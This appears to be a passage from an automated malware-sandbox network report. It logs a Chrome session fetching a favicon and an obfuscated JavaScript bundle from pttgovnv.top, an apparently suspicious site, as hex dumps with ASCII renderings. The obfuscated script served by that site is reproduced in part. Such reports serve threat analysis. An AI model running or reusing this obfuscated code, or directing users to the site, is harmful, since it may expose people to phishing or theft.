31 37 66 29 5d 7d 3b 66 6f 72 28 63 6f 6e 73 74 20 5f 30 78 33 36 36 33 64 62 20 6f
    Data Ascii: 'splice'](_0x3b4b07),_0x551988['push'](_0x3890e8);}function _0x3c84b4(_0x2fc21f,_0x25dbad,{direction:_0x5dd008,delta:_0x3f5314}){const _0x5b12f5=a9_0x3647,_0x3ac3eb={'direction':_0x5dd008,'delta':_0x3f5314,'type':Y[_0x5b12f5(0x17f)]};for(const _0x3663db o
    2024-09-01 22:28:23 UTC1369INData Raw: 20 79 74 28 5f 30 78 35 63 32 31 30 32 29 7b 63 6f 6e 73 74 20 5f 30 78 61 33 66 36 66 34 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 5f 30 78 35 63 32 31 30 32 3d 3d 5f 30 78 61 33 66 36 66 34 28 30 78 31 33 38 29 7c 7c 5f 30 78 35 63 32 31 30 32 26 26 74 79 70 65 6f 66 20 5f 30 78 35 63 32 31 30 32 3d 3d 5f 30 78 61 33 66 36 66 34 28 30 78 31 30 33 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 47 65 28 5f 30 78 66 62 37 38 35 39 29 7b 63 6f 6e 73 74 20 5f 30 78 35 61 32 65 33 32 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 5f 30 78 66 62 37 38 35 39 3d 3d 5f 30 78 35 61 32 65 33 32 28 30 78 31 33 38 29 7c 7c 74 79 70 65 6f 66 20 5f 30 78 66 62 37 38 35 39 3d 3d 5f 30 78 35 61 32 65 33 32 28
    Data Ascii: yt(_0x5c2102){const _0xa3f6f4=a9_0x13d023;return typeof _0x5c2102==_0xa3f6f4(0x138)||_0x5c2102&&typeof _0x5c2102==_0xa3f6f4(0x103);}function Ge(_0xfb7859){const _0x5a2e32=a9_0x13d023;return typeof _0xfb7859==_0x5a2e32(0x138)||typeof _0xfb7859==_0x5a2e32(


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    9192.168.2.449749104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:23 UTC585OUTGET /favicon.ico HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://pttgovnv.top/help/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:23 UTC743INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:23 GMT
    Content-Type: image/vnd.microsoft.icon
    Content-Length: 15215
    Connection: close
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:36 GMT
    ETag: W/"3b6f-18fc3d82ee0"
    CF-Cache-Status: HIT
    Age: 37680
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hXBqe74xKMFfuCupsXD4CmxAbvNTYs5hNebIl57kuNAooh3SHFAEPPlYAHq%2F%2Fm5x3ft8JR2nKnwH2eWJEyz3czxfFxo9UecOebAcSN6P%2F%2FNxRH8fhhx5OeIMJS%2BWpP8%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b16d3fc00f60-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:23 UTC626INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 4e 00 00 01 5f 08 06 00 00 00 b8 3b 43 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 21 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 32 30 31 38 3a 30 39 3a 30 37 20 30 39 3a 31 36 3a 30 36 44 2f 69 55 00 00 3a b2 49 44 41 54 78 5e ed dd cf 76 54 c7 d5 f7 f1 aa d3 b6 61 f6 38 57 00 99 07 68 0d 13 c8 8a 7c 05 96 27 59 30 8a 7c 05 b4 af c0 e2 0a 10 57 60 79 84 56 26 16 57 e0 f6 0a 24 43 35 90 79 c4 15 bc 78 06 d8 7d ea ad 5d 55 2d 09 a1 3f 7d fe 57 d5 f9 7e d6 b2 e1 b4
    Data Ascii: PNGIHDRN_;CVsRGBgAMAapHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<!tEXtCreation Time2018:09:07 09:16:06D/iU:IDATx^vTa8Wh|'Y0|W`yV&W$C5yx}]U-?}W~
    2024-09-01 22:28:23 UTC1369INData Raw: 2a 94 59 a8 62 b2 a0 c9 1c 00 e2 41 70 02 6a aa db ef 54 95 ab 4a 29 bd 20 4c 01 c0 f0 08 4e 40 03 e6 c5 9f b6 8c 2a 7e 0a 97 bd f2 95 29 65 03 94 39 2a ca 62 ae 7e 57 0b 1a cf 01 a0 5b 04 27 a0 a1 75 e6 3b f5 e9 93 40 f5 99 3a a2 42 05 00 ed 20 38 01 2d 58 be b8 7d 60 3f 4c 5f 87 cb 28 85 40 f5 d6 fe 6e e1 96 fc ca c9 5b fd d7 97 f3 f0 8f 01 00 6b 20 38 01 2d e8 b2 59 bc 6b ee b8 18 a5 8f a4 87 4a db 60 a5 97 c5 82 65 3f 00 38 1f c1 09 68 49 5f cd e2 7d 39 6e 4a 57 36 44 15 e6 88 40 05 00 04 27 a0 55 72 18 70 a9 ca 79 2e e1 e9 3c 04 2a 00 63 46 70 02 5a d6 74 b2 78 aa 3e 1a 9b 60 a4 39 bd 58 30 d0 13 40 6e 08 4e 40 07 c6 1a 9e ce e3 8f 98 51 36 40 31 36 01 40 fa 08 4e 40 47 da 3a 96 25 47 ae 21 5d cb 72 9f 59 10 a6 00 a4 84 e0 04 74 88 f0 b4 3e c2 14 80
    Data Ascii: *YbApjTJ) LN@*~)e9*b~W['u;@:B 8-X}`?L_(@n[k 8-YkJ`e?8hI_}9nJW6D@'Urpy.<*cFpZtx>`9X0@nN@Q6@16@N@G:%G!]rYt>
    2024-09-01 22:28:23 UTC1369INData Raw: 85 52 7a af 98 e8 5d 76 e4 21 27 04 27 00 ad 56 9f 44 aa 01 4a b8 7e a8 a5 99 d9 df 49 3f 14 4b 79 2d 70 15 49 5d ee 72 d8 30 72 40 70 02 e0 b4 5d 7d 12 f6 86 f9 a4 f8 cd 06 a8 44 97 6c 58 ca 6b 97 6c 2a d0 85 da d5 ef 8b 3d 96 f1 90 2a 82 13 80 8f b4 5e 7d 5a cd 80 4a 78 88 e2 f1 52 5e a9 66 f6 e7 c2 ae bc 86 8e 9b c9 13 ad 4a 62 dc 08 4e 00 3e d1 45 f5 49 a4 bc 84 b7 c2 ae bc 76 d9 f7 c4 b3 a2 d4 bb 1c ef 82 54 10 9c 00 5c 28 54 9f 76 db ae b2 e4 70 b3 94 70 e9 06 6c 2a bd dd 64 2a 3b 3c fb 9e 70 bb f1 98 4c 8e d8 11 9c 00 5c ca 55 9f 3e 37 3b 4d 0e 0c be 48 2e 4d c3 34 94 b7 87 3e 28 c4 8e e0 04 60 2d 61 89 4a 96 ef 5a df ae 2f 37 cb 54 8e 72 b9 8a 79 7e 6b 9b 2a 54 73 c7 bd 71 91 9f 8f 88 f1 21 38 01 a8 a4 fc f7 ad 99 29 6d c8 e9 a0 b2 22 01 ca 7e 2b
    Data Ascii: Rz]v!''VDJ~I?Ky-pI]r0r@p]}DlXkl*=*^}ZJxR^fJbN>EIvT\(Tvppl*d*;<pL\U>7;MH.M4>(`-aJZ/7Try~k*Tsq!8)m"~+
    2024-09-01 22:28:23 UTC1369INData Raw: 3a 3c b9 ad d8 23 3f 28 d6 fe 0c de 4c ee bd be 19 2e 71 0a 01 ea 04 bb ee f2 42 70 02 32 d6 e5 f1 2c ae cf 47 9b 6d 65 f4 97 a5 d6 5b f6 cb a4 f3 63 50 62 34 f6 5d 76 57 21 40 79 ae ef c9 d8 f0 c4 71 2d c9 23 38 01 99 eb 3c 3c a9 62 73 75 33 08 c7 75 6c d9 6f 96 4d fb e5 32 8a 43 63 a9 3a ad 87 00 15 3e 2f 8c 2c 48 1e c1 09 18 81 70 38 ee bc 8b 30 73 36 3c ad c8 ff 9f ea 8b e5 66 a9 f4 54 19 bd 99 f3 d9 67 54 9d d6 e7 83 bc d9 1d f3 59 78 bc 5f d2 46 70 02 46 c2 85 a7 cf cd 41 57 37 ac 75 6e 06 72 d3 54 aa b4 37 4e 1b a6 94 b2 7f 99 69 aa 7d 52 ee 20 62 ad 8e b4 36 0b ad 8b 03 b6 9e 57 33 f6 c3 84 99 f7 94 2e 82 13 30 32 cb 17 b7 f7 ba 5a 2e a9 f3 24 ed 2a 53 9f a9 a9 99 94 53 7b 33 f9 52 aa 53 f2 7a 0c 37 54 17 8e 84 36 6e 69 a5 28 8b b9 fd b3 1e 11 92
    Data Ascii: :<#?(L.qBp2,Gme[cPb4]vW!@yq-#8<<bsu3uloM2Cc:>/,Hp80s6<fTgTYx_FpFAW7unrT7Ni}R b6W3.02Z.$*SS{3RSz7T6ni(
    2024-09-01 22:28:23 UTC1369INData Raw: ac 2a 11 2e 3c 7d 5e 2e 2e 5b ee 0a b3 94 16 85 2e e7 aa 98 2c 62 0e 13 e6 c5 9f b6 4a a3 e5 60 d6 c6 c1 d9 2d 55 68 b3 4d 9f 07 aa 58 55 72 c3 65 f2 8c 52 2f 27 77 5f b1 39 a6 43 04 27 f4 4b fa 98 de 2b 59 96 7b 18 5e e9 90 79 a2 ee 6f cc c2 45 36 64 4b be ec 2e 5b 77 a9 eb 6c 55 4a fd ae 16 31 f5 41 f8 4a 5a 39 6b 6b f9 4e 96 32 8b 0f 7a 9b 5e 0f ac e3 bc 4a 6e ea 64 f7 a0 ec 22 0c 97 68 19 c1 09 fd d9 3f 94 86 4c 19 62 d9 5e 1f d3 65 32 1e 82 59 35 3c 9d 25 8d d5 36 4c 2d ec ef 16 85 fd 2b 86 ca 94 5b be 2b dd ee bb c6 e7 0e ca bf 5f 61 8a 6d 96 2c b0 0e bf 74 ec 2a b9 fd 7c 37 75 cc 55 5f 69 14 ef 0c c1 09 dd 93 63 52 b4 96 a7 9f 0e fa 98 2e f5 46 dd 9f 66 7b f4 8a ec 52 33 85 f9 39 5c 36 e6 2a 53 32 68 54 96 f9 24 4c 99 e2 68 88 e0 e1 76 df 15 2e 40
    Data Ascii: *.<}^..[.,bJ`-UhMXUreR/'w_9C'K+Y{^yoE6dK.[wlUJ1AJZ9kkN2z^Jnd"h?Lb^e2Y5<%6L-+[+_am,t*|7uU_icR.Ff{R39\6*S2hT$Lhv.@
    2024-09-01 22:28:23 UTC1369INData Raw: d8 e0 50 13 c1 29 57 d2 c7 a4 b5 2c 1b 7c ed 5f 80 fd ba 78 62 83 13 5f 16 97 90 10 53 7e 61 76 ed 17 43 6b 3b 2c 8d 32 8f a4 a1 36 5c ae cd 2d f1 fd ae 6e 9a 49 39 b5 5f f4 5f da af ab a9 fd 1f b3 bf 1a 1b ac ba ab 52 f9 e6 76 ed cf f4 d2 c6 85 a2 a2 2c e6 f6 db f2 2d 67 7d e1 34 57 3d d5 e6 30 5c 26 c3 7e 9e 7e b1 c1 89 5e a7 9a 08 4e b9 71 f3 98 d4 cc 86 a6 ef c3 2b 58 31 ea a5 7a 30 a5 49 7c 0d 6e bb bd d1 8f c3 65 63 d2 84 3e b9 fb 6a 3b 5c b6 c6 ed 6a 73 61 2a d0 e5 cd 52 ab 2b 7b d9 b4 84 a0 65 f1 51 08 a2 72 84 3a 64 73 40 9b 0f 1a 7d 29 ee be e2 fe 5f 13 3f b8 9c 3c 3d b4 37 26 37 c4 72 bc 7d 4c 57 b9 3f e5 3d bf a6 b6 fb 9e e4 29 b7 f8 4d 6f d1 03 84 9c a4 da eb 24 c7 30 51 41 ad 87 71 04 39 90 3e a6 a7 0b 39 57 ee 07 42 d3 15 e4 67 85 b5 48 05
    Data Ascii: P)W,|_xb_S~avCk;,26\-nI9__Rv,-g}4W=0\&~~^Nq+X1z0I|nec>j;\jsa*R+{eQr:ds@})_?<=7&7r}LW?=)Mo$0QAq9>9WBgH
    2024-09-01 22:28:23 UTC1369INData Raw: a9 a6 33 cb 3a 53 4e a8 ba d6 40 c5 69 1d 72 a6 d9 52 ef da 9f 16 13 bf 73 c6 72 5d 92 8e ab 50 46 6f db 2f b4 da e3 3f 8e ab 50 f6 2f 7d ef 25 4d b3 68 cd f2 c5 ad 1d ad e2 db 38 a4 3f e8 3f 44 b1 64 bd 7f b8 a5 ee 6f 24 53 f9 22 38 5d c6 2d cb b9 c0 44 1f d3 18 b0 5c 97 3c f3 fc ce b4 54 66 db fe 4e 7a a1 ea 2f e5 29 f5 52 66 f0 c8 f4 67 96 f2 d0 94 ec ec 94 4d 0a e1 32 1a c5 dd 57 71 64 80 a7 8b b7 6a 62 36 d5 df 37 92 78 60 21 38 5d e4 e9 e1 8e fd f1 d0 c7 34 2e cf d4 fd 29 4b 76 99 20 44 21 26 b1 f5 39 c9 f2 a1 ec 5c 0d 97 c3 da 5f 18 fb 41 7b a9 1e 4c 93 38 74 98 e0 74 96 94 0c 95 de b5 bf 6b 34 80 0f 89 32 e6 8f ea c1 06 37 c7 cc b4 19 a2 ec df 0f 0a 63 43 14 cb 79 a8 40 7a e9 64 3c 46 b8 1c 9c f4 07 4e ee be 1a be b7 4f 56 76 de eb ff e7 2f cc 77
    Data Ascii: 3:SN@irRsr]PFo/?P/}%Mh8??Ddo$S"8]-D\<TfNz/)RfgM2Wqdjb67x`!8]4.)Kv D!&9\_A{L8ttk427cCy@zd<FNOVv/w
    2024-09-01 22:28:23 UTC1369INData Raw: c3 12 b3 a9 3a 6d 31 9a 00 40 1b dc 61 cf 3d 32 f6 01 36 c2 a9 f2 d5 2b 4e c7 86 9d ed 14 67 70 92 3e 26 7f 74 07 7d 4c 75 ac 1a bf ef 4f b7 ba 69 fc ae 20 97 aa 93 1f 4d 40 af 13 80 16 d8 fb 5b 8f 8a d8 46 c4 54 6d 0c ff d4 8d 21 bf 8f e3 0a 4e b2 7b 49 4e d8 a7 8f a9 2e 99 f8 fd 6d e7 8d df 95 e5 52 75 a2 49 1c 40 5a 8c 31 bf ea 7b af 63 9b ad d7 7c a7 b2 e4 04 69 e5 19 40 1c c1 c9 8f 17 90 79 4c 72 66 0d 7d 4c 55 f9 89 df 8f c2 c4 ef d8 3e 20 ab aa 53 fa d3 c4 25 cc bb 43 a3 01 a0 01 6d fa 7b b0 d5 2a 9a f9 47 c7 ea ec a8 3b cf 72 98 46 f1 61 83 93 ac 51 ee 1f ee da c0 f4 3f fb 83 a4 8f a9 0e 09 24 7e e2 77 e4 55 9d 5c e6 3a d1 24 0e 20 1d f1 35 85 5b a6 76 63 f8 c7 24 37 0c f0 30 3b 5c 70 92 41 56 d2 c7 24 a3 d4 51 9d ef 63 fa a3 1b 60 39 58 e3 77 05
    Data Ascii: :m1@a=26+Ngp>&t}LuOi M@[FTm!N{IN.mRuI@Z1{c|i@yLrf}LU> S%Cm{*G;rFaQ?$~wU\:$ 5[vc$70;\pAV$Qc`9Xw
    2024-09-01 22:28:23 UTC1369INData Raw: 5b 22 83 76 63 d8 4d 77 91 86 df cb 27 bb ea 56 e1 09 9e 84 48 69 fc be e6 d6 43 59 72 19 4a ea 67 d9 49 69 b8 c3 c3 26 01 a4 c7 fc e7 4e ad fe 24 59 a2 8b 7f 66 53 b0 8c f8 c0 e1 86 df cb 1f cf 71 92 f0 24 d5 95 b1 93 c6 6f df 40 b6 43 1f 53 04 ae b9 aa d3 1b 7f 91 22 fd b0 cd 19 22 00 12 f7 bb aa 1c 9c d2 5a a2 73 22 6f 53 a8 7f 08 f0 a7 03 30 a5 ba 32 d6 f0 24 cd c8 85 d9 70 8d df f4 31 c5 43 c2 6b 61 d2 ee 15 92 19 22 2c d9 01 a8 21 a9 25 3a 31 d4 d9 74 55 2d 55 ad c2 c8 a7 c1 49 8c 31 3c 49 f3 b7 34 7e 4b d5 0d f1 71 ff 5d cc 77 e1 2a 45 37 58 b2 03 50 47 a1 8a ad 64 96 e8 9c 04 06 73 4a a1 a4 66 81 e4 fc e0 24 c6 16 9e b4 ba e3 ce e7 43 bc 92 1f 51 c0 92 1d 00 4b 97 6b 2f d5 b9 41 97 f7 5e a6 f3 40 ef 2b eb 5f fb 8b 98 99 96 7a 9c ce 72 4d d1 e6 1b
    Data Ascii: ["vcMw'VHiCYrJgIi&N$YfSq$o@CS""Zs"oS02$p1Cka",!%:1tU-UI1<I4~Kq]w*E7XPGdsJf$CQKk/A^@+_zrM
    2024-09-01 22:28:23 UTC1369INData Raw: 72 e6 fa 6a f4 4f 34 fa 46 42 fa 85 52 ac 3c 31 e3 09 40 1f e4 3b 46 47 58 6d 72 59 c1 0c 72 ba 42 3c c1 49 3c d8 98 db 1f c4 48 26 8d eb c7 ec b8 8b 44 ba e1 89 73 12 01 74 eb 9d 92 87 fc 1b fe 22 26 66 66 bf bb 07 19 28 1a cf 52 dd 69 7e 58 e1 ae fd d3 e5 3f 2c 53 42 a2 4c 56 67 c7 dd f0 d2 5d b6 e3 3d 04 a0 7d f1 0e bb 7c a6 ee 4f 07 3b cb 33 ae 8a d3 8a 6f 1a 1f c7 b0 4c 0e 08 8e 07 95 27 00 38 45 c7 b8 2a f2 c6 1d a3 35 a0 38 83 d3 8a f4 3d 15 66 23 fb be a7 d5 01 c1 52 f1 c0 b0 08 4f 00 20 1b b6 b6 ec f7 ca df c2 55 3c 8a e1 67 22 c6 1d 9c c4 c9 bc a7 5f c2 2b 79 92 66 5f 8e 69 89 03 e1 09 c0 98 b9 ef 10 bd 1b ae e2 31 c0 e8 81 f3 c4 d9 e3 74 11 09 15 72 8c 49 fe 9e b9 52 24 3d 2b c3 a2 e7 09 c0 18 ed 1f da d0 a4 1f 86 ab 58 0c da d7 74 5a 5a c1 49
    Data Ascii: rjO4FBR<1@;FGXmrYrB<I<H&Dst"&ff(Ri~X?,SBLVg]=}|O;3oL'8E*58=f#RO U<g"_+yf_i1trIR$=+XtZZI


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    10192.168.2.449751104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:23 UTC365OUTGET /help/assets/index-f5457718.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:23 UTC753INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:23 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:46 GMT
    ETag: W/"7b2c9-18fc3d855f0"
    CF-Cache-Status: HIT
    Age: 34356
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dz4z1IB670HHzgYFx2vUUUEhvo7ZNJUPC2avqWSm0YLmicWncLz0ETTk8bBvpLb4rwyKumNtOi139iE9OSG4XTBIW6ghtIQPRh7OTlpRXEvx6I9b5uQmbLOQJoCnN00%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b16ff8298c09-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:23 UTC616INData Raw: 37 63 62 65 0d 0a 76 61 72 20 61 33 38 5f 30 78 33 62 39 38 37 37 3d 61 33 38 5f 30 78 34 33 35 62 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 35 31 35 31 66 2c 5f 30 78 35 34 39 63 64 62 29 7b 76 61 72 20 5f 30 78 39 65 61 31 62 66 3d 61 33 38 5f 30 78 34 33 35 62 2c 5f 30 78 32 31 38 63 33 62 3d 5f 30 78 34 35 31 35 31 66 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 35 33 61 65 32 32 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 33 62 32 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 33 62 62 29 29 2f 30 78 32 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 34 63 38 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31
    Data Ascii: 7cbevar a38_0x3b9877=a38_0x435b;(function(_0x45151f,_0x549cdb){var _0x9ea1bf=a38_0x435b,_0x218c3b=_0x45151f();while(!![]){try{var _0x53ae22=-parseInt(_0x9ea1bf(0x3b2))/0x1+parseInt(_0x9ea1bf(0x3bb))/0x2+-parseInt(_0x9ea1bf(0x4c8))/0x3*(-parseInt(_0x9ea1
    2024-09-01 22:28:23 UTC1369INData Raw: 63 33 62 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 33 38 5f 30 78 34 38 32 32 2c 30 78 65 37 30 66 36 29 29 3b 66 75 6e 63 74 69 6f 6e 20 50 78 28 29 7b 76 61 72 20 5f 30 78 31 66 62 35 61 63 3d 61 33 38 5f 30 78 34 33 35 62 3b 69 6d 70 6f 72 74 2e 6d 65 74 61 5b 5f 30 78 31 66 62 35 61 63 28 30 78 35 33 63 29 5d 2c 69 6d 70 6f 72 74 28 27 5f 27 29 5b 5f 30 78 31 66 62 35 61 63 28 30 78 36 33 39 29 5d 28 28 29 3d 3e 30 78 31 29 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 2a 5f 30 78 33 65 39 34 30 33 28 29 7b 7d 7d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 31 33 34 66 33 30 3d 61 33 38 5f 30 78 34 33 35 62 2c 5f 30 78 34 37 36 37 32 39 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 65 61 39 65 62 3d 21 21 5b 5d
    Data Ascii: c3b['shift']());}}}(a38_0x4822,0xe70f6));function Px(){var _0x1fb5ac=a38_0x435b;import.meta[_0x1fb5ac(0x53c)],import('_')[_0x1fb5ac(0x639)](()=>0x1);async function*_0x3e9403(){}}(function(){var _0x134f30=a38_0x435b,_0x476729=(function(){var _0x4ea9eb=!![]
    2024-09-01 22:28:23 UTC1369INData Raw: 62 38 28 30 78 34 37 39 29 5d 29 2c 5f 30 78 34 66 64 66 37 34 5b 5f 30 78 33 37 37 34 62 38 28 30 78 31 61 36 29 2b 5f 30 78 33 37 37 34 62 38 28 30 78 36 64 61 29 5d 26 26 28 5f 30 78 33 36 39 31 65 66 5b 5f 30 78 33 37 37 34 62 38 28 30 78 33 37 32 29 2b 5f 30 78 33 37 37 34 62 38 28 30 78 36 64 61 29 5d 3d 5f 30 78 34 66 64 66 37 34 5b 5f 30 78 33 37 37 34 62 38 28 30 78 31 61 36 29 2b 5f 30 78 33 37 37 34 62 38 28 30 78 36 64 61 29 5d 29 2c 5f 30 78 34 66 64 66 37 34 5b 27 63 72 6f 73 73 6f 72 69 67 69 27 2b 27 6e 27 5d 3d 3d 3d 5f 30 78 33 37 37 34 62 38 28 30 78 35 36 36 29 2b 27 74 69 61 6c 73 27 3f 5f 30 78 33 36 39 31 65 66 5b 5f 30 78 33 37 37 34 62 38 28 30 78 35 64 65 29 2b 27 73 27 5d 3d 5f 30 78 33 37 37 34 62 38 28 30 78 32 61 63 29 3a 5f
    Data Ascii: b8(0x479)]),_0x4fdf74[_0x3774b8(0x1a6)+_0x3774b8(0x6da)]&&(_0x3691ef[_0x3774b8(0x372)+_0x3774b8(0x6da)]=_0x4fdf74[_0x3774b8(0x1a6)+_0x3774b8(0x6da)]),_0x4fdf74['crossorigi'+'n']===_0x3774b8(0x566)+'tials'?_0x3691ef[_0x3774b8(0x5de)+'s']=_0x3774b8(0x2ac):_
    2024-09-01 22:28:23 UTC1369INData Raw: 30 78 30 3b 63 6f 6e 73 74 20 5f 30 78 34 63 36 30 62 36 3d 5f 30 78 32 30 35 34 35 36 5b 27 65 6e 64 73 57 69 74 68 27 5d 28 5f 30 78 35 34 39 31 30 39 28 30 78 32 65 31 29 29 2c 5f 30 78 35 30 32 64 39 38 3d 5f 30 78 34 63 36 30 62 36 3f 27 5b 72 65 6c 3d 5c 78 32 32 73 74 79 6c 27 2b 5f 30 78 35 34 39 31 30 39 28 30 78 33 39 35 29 3a 27 27 3b 69 66 28 21 21 5f 30 78 32 38 37 62 65 66 29 66 6f 72 28 6c 65 74 20 5f 30 78 33 34 33 38 31 34 3d 5f 30 78 35 31 37 36 37 64 5b 5f 30 78 35 34 39 31 30 39 28 30 78 33 63 36 29 5d 2d 30 78 31 3b 5f 30 78 33 34 33 38 31 34 3e 3d 30 78 30 3b 5f 30 78 33 34 33 38 31 34 2d 2d 29 7b 63 6f 6e 73 74 20 5f 30 78 32 63 39 66 64 33 3d 5f 30 78 35 31 37 36 37 64 5b 5f 30 78 33 34 33 38 31 34 5d 3b 69 66 28 5f 30 78 32 63 39
    Data Ascii: 0x0;const _0x4c60b6=_0x205456['endsWith'](_0x549109(0x2e1)),_0x502d98=_0x4c60b6?'[rel=\x22styl'+_0x549109(0x395):'';if(!!_0x287bef)for(let _0x343814=_0x51767d[_0x549109(0x3c6)]-0x1;_0x343814>=0x0;_0x343814--){const _0x2c9fd3=_0x51767d[_0x343814];if(_0x2c9
    2024-09-01 22:28:23 UTC1369INData Raw: 31 28 30 78 33 38 65 29 2b 27 5c 78 32 32 68 74 74 70 3a 2f 2f 77 77 27 2b 27 77 2e 77 33 2e 6f 72 67 2f 32 27 2b 27 30 30 30 2f 73 76 67 5c 78 32 32 5c 78 32 30 78 27 2b 5f 30 78 32 30 36 62 61 31 28 30 78 34 35 39 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 33 38 30 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 31 31 63 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 32 32 39 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 35 62 34 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 35 62 37 29 2b 27 30 30 5c 78 32 32 5c 78 32 30 70 72 65 73 65 72 27 2b 5f 30 78 32 30 36 62 61 31 28 30 78 32 62 66 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 35 37 64 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 31 39 33 29 2b 27 5c 78 32 30 3c 70 61 74 68 5c 78 32 30 66 69 6c 27 2b 5f 30 78 32 30 36 62
    Data Ascii: 1(0x38e)+'\x22http://ww'+'w.w3.org/2'+'000/svg\x22\x20x'+_0x206ba1(0x459)+_0x206ba1(0x380)+_0x206ba1(0x11c)+_0x206ba1(0x229)+_0x206ba1(0x5b4)+_0x206ba1(0x5b7)+'00\x22\x20preser'+_0x206ba1(0x2bf)+_0x206ba1(0x57d)+_0x206ba1(0x193)+'\x20<path\x20fil'+_0x206b
    2024-09-01 22:28:23 UTC1369INData Raw: 32 30 76 61 6c 75 65 73 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 36 33 29 2b 27 5c 78 32 32 5c 78 32 30 64 75 72 3d 5c 78 32 32 31 73 5c 78 32 32 27 2b 27 5c 78 32 30 62 65 67 69 6e 3d 5c 78 32 32 2d 30 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 66 66 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 35 37 29 2b 27 72 65 70 65 61 74 43 6f 75 6e 27 2b 27 74 3d 5c 78 32 32 69 6e 64 65 66 69 6e 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 31 66 32 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 66 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 38 34 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 31 38 33 29 2b 27 6d 3d 5c 78 32 32 72 6f 74 61 74 65 28 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 34 34 29 2b 5f 30 78
